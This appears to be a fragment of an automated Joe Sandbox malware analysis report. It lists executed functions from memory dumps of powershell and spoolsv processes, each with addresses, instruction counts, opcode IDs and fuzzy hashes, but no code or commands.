                                                                                                                                                                                                                                                        Function 00007FFAAC644151 Relevance: .0, Instructions: 34COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1514009058.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffaac640000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3ffe3b4aa6a81fe07f224423cc1760e0a4c67481e86675b9b03959f74c79e0b2
                                                                                                                                                                                                                                                        • Instruction ID: e74cf60a03ffe29ce45419aeb3c480e590284e2e4107b0790613807b6a95816a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ffe3b4aa6a81fe07f224423cc1760e0a4c67481e86675b9b03959f74c79e0b2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 46F08C32A0D944CFE766EB1CE5428F877E0EF5636070550BBD05EC7162EA25EC49CB80

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FFAAC58644D Relevance: .7, Instructions: 733COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1669588348.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac580000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: bfbb6c45464843da704c1251dcaaca55ea1c0a522b9a1de36117d9b013f6c163
                                                                                                                                                                                                                                                        • Instruction ID: d1fe8321854c4633bc235e2fa0a084e643383c3e3b9a7660680e7c00722d4e46
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bfbb6c45464843da704c1251dcaaca55ea1c0a522b9a1de36117d9b013f6c163
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 53D16D30A58A4E8FEF84DF58C455AA97BE1FF69300F14816AE40DD7296CE34E985CBC1
                                                                                                                                                                                                                                                        Function 00007FFAAC656605 Relevance: .4, Instructions: 433COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1670596309.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac650000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a1397f092f086b85b0da4c63a44fae32b3133c21a3470682f55bc870ccfbef99
                                                                                                                                                                                                                                                        • Instruction ID: 96bd3a22a8158ee977ce50ba5c20f04da08b82b73a005dbc9aa6e56d01327fda
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a1397f092f086b85b0da4c63a44fae32b3133c21a3470682f55bc870ccfbef99
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17C145B191EB8E8FF796DB6888155B57BE0EF46310B1851BEE04DC72D3DA18D809C392
                                                                                                                                                                                                                                                        Function 00007FFAAC6542F8 Relevance: .3, Instructions: 252COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1670596309.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac650000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 529419d40d3e4bc9ff8bf2330f7965ba253ba541a4004d67dd0d3c0e1eb295aa
                                                                                                                                                                                                                                                        • Instruction ID: f984d21ce1f796eb8ea39008a06cca6249a26dac16d84054d622442a4c3d724a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 529419d40d3e4bc9ff8bf2330f7965ba253ba541a4004d67dd0d3c0e1eb295aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8771366194DA894FF756DB2848595B43FE1EF52220B1991FFD18DC71A3DE18EC0AC381
                                                                                                                                                                                                                                                        Function 00007FFAAC589F9B Relevance: .2, Instructions: 192COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1669588348.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac580000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c41f5830e87ea297a0339da57eb00f70462471fe6b1fa44f10a84373e0b637ce
                                                                                                                                                                                                                                                        • Instruction ID: 01e3c0268993da559031b1dd49ea0ad61e02254e71f40986fdd1ebc60af5a5a9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c41f5830e87ea297a0339da57eb00f70462471fe6b1fa44f10a84373e0b637ce
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E051E76794E693CBF712A76CECA61F53F94DF52229F0881B2E08CCA153EC18955993C2
                                                                                                                                                                                                                                                        Function 00007FFAAC654073 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1670596309.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac650000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4249e2b18cbcd2c53dc660b61ff53001f0c64cfd98c455ebde86fe6be8817595
                                                                                                                                                                                                                                                        • Instruction ID: 6276cbeefb05c0e25d57c13ffcd7cc6e5e25fd0a0965a9b86d2fe979445740ae
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4249e2b18cbcd2c53dc660b61ff53001f0c64cfd98c455ebde86fe6be8817595
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E514A72A4DA4E8FF7AAD72C885157477D2DF96210B28A0FEC14EC7193DE14DC098381
                                                                                                                                                                                                                                                        Function 00007FFAAC589748 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1669588348.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac580000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: dcedff7cc92a8941222723b07e969b749b3c63ae394d7eae17427353e5458dd1
                                                                                                                                                                                                                                                        • Instruction ID: 7b1c7f7ed753f3c5e0fad39128051903d4d811087872cd5fadbe63899befa82d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dcedff7cc92a8941222723b07e969b749b3c63ae394d7eae17427353e5458dd1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE41E77191CB888FEB189F5CA8466B9BBE0FB95310F04816FE449D3252DA30E955CBC2
                                                                                                                                                                                                                                                        Function 00007FFAAC58A47C Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1669588348.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac580000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c92f89a1f3addc2e007bfecaa7640f6a80ae032726f3a9f77597361a0ae47d75
                                                                                                                                                                                                                                                        • Instruction ID: 75f6eacb317c4f732f985305bbd68b731dae35a3e3d2dab53d9fcb61b285c791
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c92f89a1f3addc2e007bfecaa7640f6a80ae032726f3a9f77597361a0ae47d75
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09313B7190CB4C8FEB19DB6CA84A6F97BE0EB56330F04416FD049C3152D675A416CB91
                                                                                                                                                                                                                                                        Function 00007FFAAC6540BF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1670596309.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac650000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d1d2c6a917432b6849130e025c84853040518e692c04dcf17ce3152dc897a92c
                                                                                                                                                                                                                                                        • Instruction ID: 8158d6d98e206c68b6b01b3666e043373f441f160c8cb0fb4231f2a9566d2e7e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1d2c6a917432b6849130e025c84853040518e692c04dcf17ce3152dc897a92c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8421F57294EA8F8FF7B6DB18445153466D2EF62210B69A0FEC14EC71A3CE18DC099381
                                                                                                                                                                                                                                                        Function 00007FFAAC6543BC Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1670596309.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac650000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a4e54ce12c9d5d189500213d395959546932d7fdceda0d3b223b14f5dc268f4a
                                                                                                                                                                                                                                                        • Instruction ID: 5f118590500eb6e768db8178ac11f0d2682c5ffaf2ea86e96a8f15ecbe6f947d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4e54ce12c9d5d189500213d395959546932d7fdceda0d3b223b14f5dc268f4a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7211E73294E5898FF7A6D72884545747BD1EF02210B59A4FAD15DC70A3DE18EC188381
                                                                                                                                                                                                                                                        Function 00007FFAAC46EC0A Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1668570310.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac46d000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a40a4754f082d649e54cabe671d469e34f476bf3a8e1fe458ac1010223e7c973
                                                                                                                                                                                                                                                        • Instruction ID: 19c656d01bd294f8a765325599e96d682b77462c2e60821bc30b329e3f32b257
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a40a4754f082d649e54cabe671d469e34f476bf3a8e1fe458ac1010223e7c973
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB01A23160DE08CFD669EB2DE089895B7D0FB44324B1045AEE05DCB16ADA21F886CB85
                                                                                                                                                                                                                                                        Function 00007FFAAC5833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1669588348.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac580000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                        • Instruction ID: 31d55e4f8b66ca5e5f16fd8237a1d02646902d463fb5189d0446cab783842ff9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC01677115CB0D8FD744EF0CE451AB5B7E0FB99364F10056DE58AC3661DA36E882CB45
                                                                                                                                                                                                                                                        Function 00007FFAAC46EC1C Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000E.00000002.1668570310.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffaac46d000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 00979b8033c91ff21725d9884573008ef03929ea7c013757f0912a1e3deb5ab8
                                                                                                                                                                                                                                                        • Instruction ID: 1cafa00a5c49750e2c99e9fa902fa2e52f29d1c88e9bb2a52e5cc2a2b81fcecf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00979b8033c91ff21725d9884573008ef03929ea7c013757f0912a1e3deb5ab8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F01730519E08CFDBA4EF2DC889D127BE1FB983147114699E45ECB26AD634F881CB90

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FFAAC591739 Relevance: .8, Instructions: 801COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 7e6f51840133ddbf457605f9d56bc17f40ea69a12ab2f3a34c4bfaba8c9cfdd6
                                                                                                                                                                                                                                                        • Instruction ID: a41640cac62d1c70e0352bc703726526c366f2e43479462ef64698f7f9eb1e50
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e6f51840133ddbf457605f9d56bc17f40ea69a12ab2f3a34c4bfaba8c9cfdd6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8442DA61B5CA5A8FF794EB78C45A77977D6FF99300F4085B9E00EC3292DD2DA8058382
                                                                                                                                                                                                                                                        Function 00007FFAAC592161 Relevance: .2, Instructions: 210COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d0988fb3556673405fe3b869887be8e9b6a224e68c639cf2c2bf04c2f198182f
                                                                                                                                                                                                                                                        • Instruction ID: 78a5762ac36419b9d541f4d32949a016c00bafecd879c7d6a2dc5685bc8a6463
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0988fb3556673405fe3b869887be8e9b6a224e68c639cf2c2bf04c2f198182f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68512151A5E6C64FE786A7789864675BFE8EF87215B1804FBE0CDC71A3DD0C480AC382
                                                                                                                                                                                                                                                        Function 00007FFAAC590705 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 38990b74f38bf0dd1aab3b4d596eb90c93f892554090e2c5455a4dd4943589ee
                                                                                                                                                                                                                                                        • Instruction ID: 0d78568e9cf9ef574a53ccbd542ae47b7d864bcae757c74eee59912af45e37d7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38990b74f38bf0dd1aab3b4d596eb90c93f892554090e2c5455a4dd4943589ee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91811862A8E6C64FE345E7A8D8655F87FA1EF96314B5884BAD089C7393CC18980DC7C1
                                                                                                                                                                                                                                                        Function 00007FFAAC590EAE Relevance: .2, Instructions: 204COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e80e4bcd0474d65c45ba2549428f7f7b3a7b908050628a320f2a8394b7db56b4
                                                                                                                                                                                                                                                        • Instruction ID: 0aabfca1d8baaaa4ed40982a33b893eea884efeef25fcfa7195843a0b91caef1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e80e4bcd0474d65c45ba2549428f7f7b3a7b908050628a320f2a8394b7db56b4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39513A62A4D7864FE356A37CD8655B53FD5EF8B22070984FBE08DC71A3DC1C98468392
                                                                                                                                                                                                                                                        Function 00007FFAAC590650 Relevance: .1, Instructions: 137COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fa02898d1ce19685fdca04fb744d37c5836eff157eb861556aaad15de7f1b090
                                                                                                                                                                                                                                                        • Instruction ID: f7a63d2e6a8fa2a2d2ed70c2d3767fcc6da1261d0e34723c397b541b16640a4c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fa02898d1ce19685fdca04fb744d37c5836eff157eb861556aaad15de7f1b090
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5319562B189490FE698F72CD45A679B6C5EB99315F0445BAE04EC3293DD589C428381
                                                                                                                                                                                                                                                        Function 00007FFAAC590D41 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ade52cb6c7eb98342fcbe527038e6fe367160eb74979596931cfe4af9d9cd439
                                                                                                                                                                                                                                                        • Instruction ID: 5400ba3d9e8a8de411a78115247e4e6f138ab1b8a140b1d460013f36351e0603
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ade52cb6c7eb98342fcbe527038e6fe367160eb74979596931cfe4af9d9cd439
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D31C2A2B18A4A5FE784B7BC981A7B976D5EF9D311F0485BAE00DC3292DD2C98024381
                                                                                                                                                                                                                                                        Function 00007FFAAC590BFB Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d86a4ed10c185ee4aef93052daa1a87fb0771a93ca39f9b68c73132a06cd6ff8
                                                                                                                                                                                                                                                        • Instruction ID: 78a0d1c91e2f258d03fc6e1036ea60e80d0c8c32cd74b2be19098498882085fe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d86a4ed10c185ee4aef93052daa1a87fb0771a93ca39f9b68c73132a06cd6ff8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A3319475A58A4A8FEB44EBB8C8556FDBBE1FF98304F508578D009D3382CD39A8458781
                                                                                                                                                                                                                                                        Function 00007FFAAC590870 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ca6ab3731e47084e76d321dd17d084bef63c4bae095917cbe2618a2cf07d3297
                                                                                                                                                                                                                                                        • Instruction ID: cc93e9b74a0bdfa31e45416aead306c13db6955d2e9a758c3da406d6908d6a4c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ca6ab3731e47084e76d321dd17d084bef63c4bae095917cbe2618a2cf07d3297
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4531A56169C6C94FD784EB68C4A29BD3FB1EF89308BD1C5B5D40AC7396CD2C68098783
                                                                                                                                                                                                                                                        Function 00007FFAAC591652 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d9c5ad02f943df3d4fc4913e0b6bf835cf96f8e798497920c08cd3000d0916ff
                                                                                                                                                                                                                                                        • Instruction ID: 3cd9bf759ee33d58396eab5e30d6c5a563a33429e4c784b179e4dcc0101524ec
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d9c5ad02f943df3d4fc4913e0b6bf835cf96f8e798497920c08cd3000d0916ff
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB11A261E5891B8BEB44E76CD8555FEB7B1FF44350F808175E00EE2696CE29680A47C0
                                                                                                                                                                                                                                                        Function 00007FFAAC592331 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000016.00000002.1957577504.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_22_2_7ffaac590000_spoolsv.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: fe1a0c56656a004b442c4919be2883f5d0ab39ae5fc4e89cf682fc0efd704ee9
                                                                                                                                                                                                                                                        • Instruction ID: 5f7fed2519a8b117f76f722c33662d9dccc1f159c781595edfc89371e287742e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe1a0c56656a004b442c4919be2883f5d0ab39ae5fc4e89cf682fc0efd704ee9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E301244194E6938FF74967289C515757FE4DB96341B1444FAF489CA1A3D80CA94983C2

